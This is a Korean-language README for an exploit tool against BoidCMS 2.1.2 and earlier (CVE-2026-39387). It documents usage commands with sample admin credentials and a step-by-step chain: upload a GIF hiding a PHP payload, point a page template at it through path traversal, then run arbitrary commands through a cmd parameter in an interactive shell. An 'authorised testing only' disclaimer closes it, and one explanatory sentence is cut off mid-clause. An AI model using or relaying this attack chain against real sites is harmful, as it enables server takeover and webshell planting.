
BoidCMS <= 2.1.2 RCE 익스플로잇
BoidCMS <= 2.1.2는 인증된 공격자가 두 가지 취약점을 결합하여 원격 코드 실행(RCE)을 달성할 수 있게 합니다.
image/gif)의 파일을 허용하므로 GIF 파일에 포함된 PHP 코드가 서버에 저장될 수 있습니다.tpl 매개변수를 허용하며, 이 매개변수는 검증 없이 테마 디렉터리를 기준으로 해석되므로 경로 탐색(예: ../../media/shell.gif)을 통해 페이지의 템플릿을 업로드된 파일로 지정할 수 있습니다.조작된 페이지가 렌더링되면 PHP 인터프리터가 포함된 페이로드를 실행합니다.
| 필드 | 값 |
|---|
| 소프트웨어 | BoidCMS |
| 버전 | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
| 플래그 | 설명 | 예시 |
|---|---|---|
-u, --url | 대상 BoidCMS 사이트의 기본 URL | http://target.com |
-l, --user | 관리자 사용자 이름 | admin |
-p, --passwd | 관리자 비밀번호 | password123 |
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
익스플로잇이 완료되면 원격 호스트에서 명령을 실행할 수 있도록 대화형 셸 프롬프트(cmd >>)가 제공됩니다.
1. Login → POST /admin (with CSRF token)
2. Upload shell → POST /admin?page=media (shell.gif containing PHP payload)
3. Create page → POST /admin?page=create (tpl=../../media/shell.gif)
4. Execute shell → GET /<permalink>?cmd=<command>
pip install requests
이 익스플로잇은 교육 목적과 승인된 보안 테스트 용도로만 제공됩니다. 소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.